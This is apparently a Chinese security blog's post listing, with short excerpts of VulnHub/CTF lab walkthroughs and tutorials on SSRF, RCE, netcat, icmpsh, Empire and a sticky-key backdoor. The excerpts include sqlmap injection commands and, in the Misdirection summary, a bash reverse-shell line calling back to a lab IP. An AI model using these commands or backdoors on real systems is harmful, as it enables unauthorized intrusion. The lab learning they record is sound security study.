摘要: 渗透测试常用术语总结 题记 人的一生会遇到两个人,一个惊艳了时光,一个温柔了岁月。——苏剧《经年》 正文 我是会把我遇到很晦涩或者难以理解的词语分享到这的。相信大家和我一样,搞不清这些专业名词的区别,所以我来整理一下。 1. POC、EXP、Payload与Shellcode POC:全称 ' Pr 阅读全文
posted @ 2023-12-20 13:20 gcc_com 阅读(43) 评论(0) 推荐(0) 编辑
摘要: 文章链接记录 该文章为已经学习或者即将要学习的文章链接记录,与大家一起分享。 tips:此文章会不断更新滴!【更新时间:2024.05.09--可能会暂不更新了。。。】 目录文章链接记录一、干货记录_总结、技巧总结干货、实战技巧未分类二、漏洞复现漏洞分析永恒之黑域控漏洞docker 逃逸总结URL跳 阅读全文
posted @ 2023-10-01 15:53 gcc_com 阅读(415) 评论(2) 推荐(0) 编辑
摘要: LAMP SecurityCTF5 一、nmap cat ports | grep open | awk -F '/' '{print $1}' | tr '\n' ',' cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',' 阅读全文
posted @ 2024-05-06 10:37 gcc_com 阅读(5) 评论(0) 推荐(0) 编辑
摘要: pWnOS_v2.0 一、nmap 靶机ip找不见的自行上网查找解决办法。 二、web渗透 目录爆破 /blog/ whatweb /search.php /register.php qwe 123qwe 点击给定的链接 兔子洞,无法登入?一直卡在这个界面 wfuzz 貌似没什么用 nmap -> 阅读全文
posted @ 2024-04-29 22:26 gcc_com 阅读(24) 评论(0) 推荐(0) 编辑
摘要: BlackRose 一、nmap 二、web渗透 随便看看 注册进去 账号:xxxxxx 密码:xxxxxx 目录爆破 有很多特殊的目录,不过访问后都重定向了 burpsuite改包进admin 查看xxxxxx用户数据包 抓一些xxxxxx用户的一些记录包,看看有什么可用的 signature=& 阅读全文
posted @ 2024-04-28 15:04 gcc_com 阅读(5) 评论(0) 推荐(0) 编辑
摘要: Tomato 一、nmap 2211是ssh的端口,21的ftp也不是弱密码 二、web渗透 随便看看 目录爆破 /seclists/Discovery/Web-Content/common.txt /antibot_image/antibots/readme.txt 发现该站点存在反爬机制 /an 阅读全文
posted @ 2024-04-17 12:53 gcc_com 阅读(11) 评论(0) 推荐(0) 编辑
摘要: Brainpan 1、nmap 2、web渗透 随便看看 目录爆破 使用不同工具,不同字典进行爆破 9999端口分析 10000端口分析 字符串信息中,提示这个程序不能运行在DOS模式下,然后有32个A,还有一行关于复制字节到缓冲区的信息,还有一行比较奇怪的字符shitstorm,有可能会是密码,接 阅读全文
posted @ 2024-04-14 10:29 gcc_com 阅读(3) 评论(0) 推荐(0) 编辑
摘要: Hackademic-RTB1 一、nmap 扫全端口会爆炸,暂时使用默认先扫描出两个 二、web渗透 随便看看 简单目录爆破 /Hackademic_RTB1/ 根据界面提示,我们可以来到这个目录 源码处发现框架 再次目录爆破 wscan扫描 WordPress 1.5.1 searchsploi 阅读全文
posted @ 2024-04-10 12:24 gcc_com 阅读(4) 评论(0) 推荐(0) 编辑
摘要: daybreak简单使用 B/S架构 启动or关闭daybreak # 启动 方式一: chmod + x nserver_linux_amd64 nserver_linux_amd64 server - tls - p 23333 & 方式二: ./install.sh #关闭 systemctl 阅读全文
posted @ 2024-04-05 09:38 gcc_com 阅读(24) 评论(0) 推荐(0) 编辑
摘要: Web渗透_SSRF漏洞 一、介绍SSRF漏洞 SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连 阅读全文
posted @ 2024-04-04 20:46 gcc_com 阅读(16) 评论(0) 推荐(1) 编辑
摘要: Connect-the-dots 一、nmap cat ports | grep open | awk -F '/' '{print$1}' | paste -sd ',' > nmap_open_port_total.txt 二、ftp渗透 没啥 三、web渗透 随便看看 图片隐写 目录爆破 没错 阅读全文
posted @ 2024-04-02 11:57 gcc_com 阅读(5) 评论(0) 推荐(0) 编辑
摘要: Empire使用 ①Empire简单介绍 Empire是一个纯粹的PowerShell开发后代理,基于加密安全的通信和灵活的体系结构构建。Empire实现了运行PowerShell代理的功能,而无需powershell.exe,从关键记录器到Mimikatz的可快速部署的利用后模块,以及适应性强的通 阅读全文
posted @ 2024-03-29 12:47 gcc_com 阅读(17) 评论(0) 推荐(0) 编辑
摘要: billub0x 一、nmap 二、web渗透 随便看看 万能密码 没戏 bp抓包导成文件 sqlmap sqlmap -r sql.txt --batch --dbs --random-agent -p "un" sqlmap -r sql.txt --batch --dbs --random-a 阅读全文
posted @ 2024-03-24 09:53 gcc_com 阅读(41) 评论(0) 推荐(0) 编辑
摘要: Moonsec_Projet_7 1、基础介绍 1.1 网络拓扑图 主机 账号 密码 网卡 IP Windows Server 2016 administrator !@#QWE123 vmnet17(web) | vmnet18 192.168.0.144(www.moonlab.com) | 1 阅读全文
posted @ 2024-03-22 10:52 gcc_com 阅读(22) 评论(0) 推荐(0) 编辑
摘要: IPC$管道通信 IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接, 阅读全文
posted @ 2024-03-19 17:11 gcc_com 阅读(34) 评论(0) 推荐(0) 编辑
摘要: Fowsniff 1、nmap 2、web渗透 简单浏览 目录爆破 发现可以文件,下载分析 隐写分析 无果,重新浏览80端口 官网浏览 pastebin.com/378rLnGi信息泄露 制作字典 发现爆破均无果 hash识别 john暴力破解hash 发现爆破一次之后,对方会有限制,一段时间后又可 阅读全文
posted @ 2024-03-18 19:18 gcc_com 阅读(4) 评论(0) 推荐(0) 编辑
摘要: NC(netcat)基本操作 前提: 凭空是无法打开端口,那么我们就可以使用nc这个工具开启我们想要开放的端口。 想开什么端口就可以开什么端口让别人进入。 nc的启用 Windows端nc使用方法 Kali端nc使用方法 基本使用方法一、监听/聊天工具 方法:kali上使用nc去连接Windows7 阅读全文
posted @ 2024-03-17 19:14 gcc_com 阅读(49) 评论(0) 推荐(1) 编辑
摘要: Windows粘滞键后门 原理:把sethc.exe粘滞键功能替换成cmd.exe的shell窗口,连续按5次shift键即可呼出cmd。 ①粘滞键替换成cmd的基本应用 1、找到粘滞键应用所在的位置。 在C:/Windows/System32这个目录(系统进程的目录)下可找到粘滞键sethc这个应 阅读全文
posted @ 2024-03-13 22:03 gcc_com 阅读(50) 评论(0) 推荐(0) 编辑
摘要: 小工具icmpsh的基本操作 基础介绍 原理:通过icmp这个协议进行反弹一个shell 前提条件:Kali(192.168.126.134)与Windows7(192.168.126.129)靶机需要在同一个网段(内网)当中,可以进行通信 操作流程 1、github上下载资源,复制进Kali,进行 阅读全文
posted @ 2024-03-10 20:19 gcc_com 阅读(22) 评论(0) 推荐(0) 编辑
摘要: My_file_server_1(VulnHub) 1、nmap 2、目录爆破 gobuster dirb dirsearch 3、文件服务器渗透 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 | ftp-syst: | STAT: 阅读全文
posted @ 2024-03-06 20:46 gcc_com 阅读(2) 评论(0) 推荐(0) 编辑
摘要: RCE命令执行&代码执行漏洞 RCE命令执行漏洞 RCE漏洞简介 RCE(remote code/command execute) 远程代码/命令执行漏洞 RCE漏洞是两个漏洞: 代码执行漏洞 # 针对后端语言! 命令执行漏洞 # 针对系统! 如何产生 在 Web应用中有时候程序员为了考虑灵活性、简 阅读全文
posted @ 2024-02-27 17:42 gcc_com 阅读(38) 评论(0) 推荐(0) 编辑
摘要: Misdirection(VulnHub) nmap扫描 目录爆破 80小探索 searchsploit 无果 8080端口渗透 反弹shell bash -i >& /dev/tcp/192.168.2.228/11111 0>&1 python -c 'import socket,subproc 阅读全文
posted @ 2024-02-25 20:40 gcc_com 阅读(7) 评论(0) 推荐(0) 编辑